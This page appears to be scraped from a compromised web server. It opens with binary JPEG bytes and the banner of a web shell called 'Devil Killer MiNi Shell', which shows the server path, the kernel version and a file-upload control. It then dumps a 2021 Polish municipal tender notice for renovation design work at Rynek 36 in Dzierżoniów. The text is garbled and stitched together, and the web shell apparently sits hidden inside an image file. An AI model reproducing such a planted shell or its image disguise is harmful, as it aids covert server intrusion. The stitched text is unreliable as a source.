JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210923/0018967601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wyk. dok. projekt. i STWIORB dla remon. pom. zlokal. na II kondyg. oraz na I kondyg.w budynku nr 36 przy ul. Rynek w Dz-owie, w ramach real. zad. inwest. pn. „Remont pomieszczeń w budynku Rynek 36”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Dzierżoniów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890717830</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dzierżoniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 74 645 08 82</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 74 645 08 82</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@um.dzierzoniow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dzierzoniow.ezamawiajacy.pl/, https://bip.um.dzierzoniow.pl/, https://dzierzoniow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wyk. dok. projekt. i STWIORB dla remon. pom. zlokal. na II kondyg. oraz na I kondyg.w budynku nr 36 przy ul. Rynek w Dz-owie, w ramach real. zad. inwest. pn. „Remont pomieszczeń w budynku Rynek 36”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e8212198-1c41-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00189676</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001996/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.19 Remont pomieszczeń w budynku Rynek 36</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://dzierzoniow.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://dzierzoniow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie zakupowej eZamawiający, tj.: Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;Włączona obsługa JavaScript; Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. Zamawiający<br/>określa informacje na temat kodowania i czasu odbioru danych tj.: Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu. Zamawiający określił dopuszczalne formaty przesyłanych danych w SWZ tj. plików o wielkości do 100 MB. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .rtf .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip lub .7Z. Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej zostały opisane na Platformie w zakładce „Regulacje i procedury procesu zakupowego” pod adresem internetowym<br/>https://dzierzoniow.ezamawiajacy.pl/. Wszelką korespondencję związaną z postępowaniem, należy przekazywać za pośrednictwem Platformy. Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do Zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.<br/>Oferta wraz z załącznikami musi zostać w ogólnie przyjętych formatach danych i<br/>złożona w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem osobistym albo podpisem zaufanym pod rygorem nieważności. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów musi być zgodny z wymogami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: Administratorem Danych jest Gmina Miejska<br/>Dzierżoniów reprezentowana przez Burmistrza Dzierżoniowa ul. Rynek 1, 58-200 Dzierżoniów tel. 74 645 0800; Inspektor Ochrony Danych - Kontakt: Urząd Miasta w Dzierżoniowie, ul. Rynek 1, pok. 22 tel. 74 645 0808, e-mail: inspektorodo@um.dzierzoniow.pl; Będziemy przetwarzać Twoje dane w celu<br/>przeprowadzenia zamówienia publicznego, a w przypadku wyboru najkorzystniejszej oferty w celu zawarcia i realizacji umowy, Będziemy przetwarzać Twoje dane na podstawie: 1. Art. 6 ust. 1 lit. c<br/>RODO, tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze 2. Ustawy z dnia 11.09.2019r. Prawo zamówień publicznych wraz z aktami wykonawczymi do ustawy 3. Ustawy z dnia 27.08.2009r. o finansach publicznych. W przypadku wyboru<br/>najkorzystniejszej oferty również na podstawie art. 6 ust. 1 lit. b) RODO- tj. przetwarzanie jest niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą lub do podjęcia działań na żądanie osoby, której dane dotyczą przed zawarciem umowy; Twoje dane osobowe będą<br/>przechowywane przez okres wynikający z jednolitego rzeczowego wykazu akt lub przez okres trwałości projektu dofinansowanego ze źródeł zewnętrznych wynikający z odrębnych przepisów prawa;<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp; Odbiorcy Twoich danych - Twoje dane osobowe w postaci nazwy/imienia i nazwiska oraz adresu prowadzenia działalności gospodarczej mogą zostać udostępnione:- w Biuletynie Zamówień<br/>Publicznych / w Dzienniku Urzędowym Unii Europejskiej,- na Platformie Zakupowej eZamawiający,-w Biuletynie Informacji Publicznej Urzędu Miasta w Dzierżoniowie,-wykonawcom biorącym udział w postępowaniu,-organom upoważnionym na mocy przepisów prawa,-wykonawcom świadczącym usługi<br/>na rzecz Zamawiającego, min. firma Market Planet Otwarty Rynek Elektroniczny S.A.-dostawca platformy zakupowej do obsługi zamówień publicznych.Ponadto po zawarciu umowy w/w dane mogą zostać udostępnione każdej osobie, która wystąpi z wnioskiem o ich udostępnienie w trybie dostępu do<br/>informacji publicznej (jeśli nie będą zachodziły przesłanki wyłączające); Twoje prawa związane z przetwarzaniem danych osobowych - Przysługują Ci, w sytuacjach określonych prawem, następujące prawa związane z przetwarzaniem danych osobowych:- na podstawie art. 15 RODO prawo dostępu do<br/>danych osobowych Pani/Pana dotyczących;- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;- na podstawie art. 18 RODO prawo żądania od administratoraograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;Nie przysługuje Ci:- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Klauzula informacyjna stanowi załącznik nr 10 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR-P.271.89.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie dokumentacji projektowej i specyfikacji technicznych wykonania, i odbioru robót budowlanych dla remontu pomieszczeń zlokalizowanych na II kondygnacji (pow. ok. 316m2) oraz na I kondygnacji (pow. ok. 130m2) w budynku nr 36 przy ul. Rynek w Dzierżoniowie, w ramach realizacji zadania inwestycyjnego pn. „Remont pomieszczeń w budynku Rynek 36”. Zamawiający ponadto informuje, że budynek<br/>wpisany jest do rejestru zabytków.<br/>2. Zakres rzeczowy przedmiotu zamówienia obejmuje wykonanie dokumentacji projektowej i<br/>specyfikacji technicznych wykonania i odbioru robót budowlanych:<br/>1) zgodnie z Rozporządzeniem Ministra Infrastruktury z 02.09.2004r.<br/>z późniejszymi zmianami w sprawie szczegółowego zakresu i formy dokumentacji projektowej,<br/>specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno -<br/>użytkowego (t.j. Dz.U.<br/>z 2013r., poz.1129), w zakresie specjalności: architektoniczno-budowlanej, oraz instalacji<br/>sanitarnych i elektrycznych;<br/>2) zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002r. (t.j. Dz.U.2019<br/>poz. 1065 z póź. zm.) w sprawie warunków technicznych, jakim powinny odpowiadać budynki i<br/>ich usytuowanie;<br/>W przypadku udokumentowania braku możliwości uzyskania parametrów zgodnych<br/>z w/w rozporządzeniem należy uzyskać zgodę na odstępstwo od przepisów technicznobudowlanych<br/>w trybie art. 9 ustawy Prawo Budowlane. Postanowienie na odstępstwo należy<br/>uzyskać od właściwego organu administracji architektoniczno-budowlanej;<br/>3) zgodnie z Rozporządzeniem Ministra Rozwoju z dnia 11.09.2020r.<br/>w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. 2020, poz. 1609);<br/>4) zgodnie z Prawem Zamówień Publicznych (Dz.U. z 2019 poz. 2019 z późn zm.), gdyż opracowana przez Wykonawcę dokumentacja będzie stanowiła część opisu przedmiotu zamówienia w zamówieniu publicznym na roboty budowlane;<br/>5) zgodnie ze wszystkimi pozostałymi przepisami szczegółowymi mającymi zastosowanie i wpływ na kompletność i prawidłowość wykonania dokumentacji projektowej, w tym z prawem budowlanym;<br/>oraz wykonanie:<br/>- kosztorysów inwestorskich i przedmiarów robót zgodnie<br/>z Rozporządzeniem Ministra Infrastruktury z dn. 18.05.2004r. w sprawie określania metod i<br/>podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac<br/>projektowych oraz planowanych kosztów robót budowlanych określonych w programie<br/>funkcjonalno – użytkowym (Dz.U. z 2004r. Nr 130, poz. 1389) z podziałem na branże, w tym<br/>oddzielnie dla piętra I i pietra II;<br/>3. Zakres rzeczowy przedmiotu zamówienia obejmuje ponadto:<br/>1) uzyskanie decyzji o pozwoleniu na budowę/zgody od właściwego organu na realizację robót,<br/>oraz wszelkich innych decyzji wymaganych prawem wraz z wszelkimi wymaganymi<br/>uzgodnieniami, w tym decyzji Konserwatora zabytków. Wykonawca zobowiązany jest do<br/>uzupełnienia materiałów oraz udzielania stosownych wyjaśnień na wezwanie właściwego organu<br/>po złożeniu wniosku o wydanie zgody/decyzji na realizację robót i w trakcie postępowania;<br/>2) wykonanie wszelkich niezbędnych opracowań (w tym opinii<br/>i ekspertyz) wymaganych obowiązującym prawem warunkujących uzyskanie decyzji/zgody na<br/>realizację robót;<br/>3) wykonanie niezbędnej inwentaryzacji budowlanej obiektu na potrzeby wykonania<br/>dokumentacji projektowej;<br/>4) uzyskanie z Wydziału Gospodarki Nieruchomości i Architektury wypisu<br/>i wyrysu z Miejskiego Planu Zagospodarowania Przestrzennego o ile zachodzi taka konieczność;<br/>5) uzyskanie mapy sytuacyjno – wysokościowej na potrzeby projektu;<br/>6) uzyskanie warunków przyłączenia mediów (np. oświetlenia) o ile zajdzie taka konieczność;<br/>4. Zakres rzeczowy projektu budowlanego obejmuje w szczególności:<br/>4.1 Remont pomieszczeń zlokalizowanych na II piętrze w zakresie:<br/>1) korytarza (wymiana okna, posadzki, malowanie ścian i sufitu wraz z wykonaniem niezbędnych<br/>napraw tynkarskich i wymiany instalacji elektrycznej);<br/>2) zaadaptowania części pomieszczenia nr 2.1 na pomieszczenie serwerowni (remont posadzki,<br/>ścian, wymiana okna instalacji, wentylacja itd), wraz z okablowaniem, szafą krosowniczą 800<br/>x800 – 24U, obsługującej pomieszczenia nr 2.5, 2.4, 2.3, 2.2, 2.1 oraz zlokalizowaną na I piętrze<br/>salą konferencyjną. W szafie krosowniczej zaprojektować m.in. Patch Panel, switch oraz media<br/>konwerter. Drzwi do serwerowni powinny spełniać podwyższone normy bezpieczeństwa<br/>stosowane w serwerowniach. Od serwerowni należy zaprojektować połączenie światłowodowe<br/>do studni teletechnicznej zlokalizowanej przy budynku Rynek nr 36 - skrzyżowanie ulic Rynek i<br/>Świdnicka. Ze studni tej istnieje światłowodowe połączenie z tut. Urzędem (budynek Ratusza).<br/>Ponadto, również pomieszczenie 2.7 należy zaadaptować na pomieszczenie serwerowni,<br/>zaprojektować w nim sieć LAN 3x3, instalację elektryczną itd. Do tego pomieszczenia zostanie<br/>przeniesiony serwer z I piętra budynku. Zaprojektowaną sieć LAN z pomieszczeń 2.6, 2.8. 2.9,<br/>2.10, 2.11 należy włączyć do szafy krosowniczej znajdującej się na I piętrze w pomieszczeniu<br/>CUW.<br/>3) pomieszczenia nr 2.14 wc - remont sufitu, ścian, posadzki, wymiana drzwi oraz armatury;<br/>4) wymiany stolarki okiennej (wraz z parapetami) i drzwiowej na II piętrze;<br/>5) wyrównanie (np. poprzez wyminę istniejących warstw stropowych) oraz wymianę istniejących<br/>posadzek w pomieszczeniach (likwidacja progów) na wykładzinę obiektową oraz malowanie ścin<br/>i sufitów wraz z wykonaniem gładzi i naprawą tynków oraz likwidacją zarysowań ścian i sufitów;<br/>6) wymiany grzejników w pomieszczeniach wraz z montażem zaworów termostatycznych;<br/>7) wymiany inst. elektrycznej oświetlenia i gniazd wtykowych, w tym zaprojektowanie instalacji<br/>elektrycznej dedykowanej (komputerowej);<br/>8) zaprojektowania sieci komputerowej (LAN) i internetowej oraz telefonicznej w<br/>pomieszczeniach, ilość stanowisk komputerowych w pomieszczeniach II piętra została określona<br/>na szkicu stanowiącym załącznik nr 1;<br/>9) zmniejszenie otworów drzwiowych do wielkości normatywnych w pom. nr 2.6 oraz 2.11;<br/>10) w pomieszczeniu nr 2.5 wyodrębnić zaplecze socjalne z kącikiem kuchennym<br/>doprowadzając wodę i kanalizację sanitarną, pomieszczenie to wyposażyć w kuchnię indukcyjną wraz ze stosowną instalacją elektryczną, zlewozmywakiem i umeblowaniem;<br/>4.2 Remont pomieszczeń sali konferencyjnej i zaplecza zlokalizowanych na I piętrze w zakresie<br/>• wyrównanie i wymianę istniejącej podłogi (paneli) na parkiet w sali konferencyjnej oraz w<br/>zapleczu na wykładzinę obiektową,<br/>• wymianę istniejącej stolarki okiennej i parapetów, renowację i malowanie stolarki drzwiowej<br/>wraz z montażem progu kamiennego przy drzwiach wejściowych do sali konferencyjnej,<br/>• przearanżowanie istniejącego zaplecza na pomieszczenie socjalne z kącikiem kuchennym<br/>doprowadzając wodę i kanalizację sanitarną; pomieszczenie to wyposażyć w kuchnię<br/>indukcyjną wraz ze stosowną instalacją elektryczną, zlewozmywakiem i umeblowaniem,<br/>• wyminę inst. elektrycznej oświetlenia i gniazd wtykowych w obrębie pomieszczeń wraz z<br/>montażem licznika energii elektrycznej określającego zużycie energii w tych pomieszczeniach<br/>oraz pom. 2.1, 2.2, 2.3, 2.4, 2.5, 2.15, 2.16, 2.14, 2.13 (zlokalizowanych na II p.)<br/>• malowanie ścin i sufitów wraz z wykonaniem gładzi i naprawą tynków oraz likwidacją<br/>zarysowań ścian i sufitów; malowanie grzejników i rur, montaż zaworów termostatycznych,<br/>• remont sufitu wraz z odtworzeniem sztukaterii i montażem stylizowanego żyrandolu i kinkietów<br/>ściennych w sali konferencyjnej,<br/>• wykonanie sieci komputerowej (LAN) i internetowej, wyposażenie audio-wideo, ekran zwijany,<br/>żaluzje okienne,<br/>• wymianę istniejącej zabudowy ściennej w korytarzu przed wejściem do sali lub lub jej<br/>osłonięcie/zabudowę mające na celu poprawę estetyki ściennej ciągu korytarzowego.<br/>Prace projektowe należy wykonać z zapewnieniem likwidacji barier architektonicznych dla osób<br/>niepełnosprawnych.<br/>5. Zamawiający informuje, że budynek wpisany jest do rejestru zabytków.<br/>6. Należy sporządzić niezbędną ilość egzemplarzy dokumentacji projektowej<br/>w celu przekazania ich odpowiednim instytucjom oraz dostarczyć Zamawiającemu:<br/>1) projekt budowlany w tym: projekt zagospodarowania terenu, projekt architektonicznobudowlany,<br/>projekt techniczny - 5 egzemplarzy;<br/>2) projekt wykonawczy - 5 egzemplarzy;<br/>3) przedmiar robót - 2 egzemplarze, z podziałem na branże, w tym oddzielnie dla piętra I i pietra<br/>II;<br/>4) kosztorys inwestorski - 2 egzemplarze, z podziałem na branże, w tym oddzielnie dla piętra I i<br/>pietra II;<br/>5) specyfikacje techniczne wykonania i odbioru robót budowlanych - 5 egzemplarzy.<br/>7. Załączniki formalno-prawne, w tym decyzje, opinie, uzgodnienia Wykonawca przekaże<br/>Zamawiającemu w oryginałach. Ponadto należy przekazać Zamawiającemu w/w dokumentację<br/>w formie elektronicznej PDF, w jednym egzemplarzu (1 płyta CD), która będzie zgodna z formą<br/>papierową w/w opracowań.<br/>8. Wspólny Słownik Zamówień: 71220000-6 usługi projektowania architektonicznego<br/>Dodatkowe przedmioty : 71323100-9 usługi projektowania systemów zasilania energią<br/>elektryczną<br/>9. Wykonawca udzieli Zamawiającemu rękojmi na przedmiot zamówienia. Bieg terminu rękojmi<br/>rozpoczyna się od dnia odbioru przedmiotu zamówienia, zaś kończy się z upływem ostatniego<br/>dnia 60 miesiąca licząc od dnia dokonania odbioru przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71323100-9 - Usługi projektowania systemów zasilania energią elektryczną</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">250 dni</span></h3> <h3 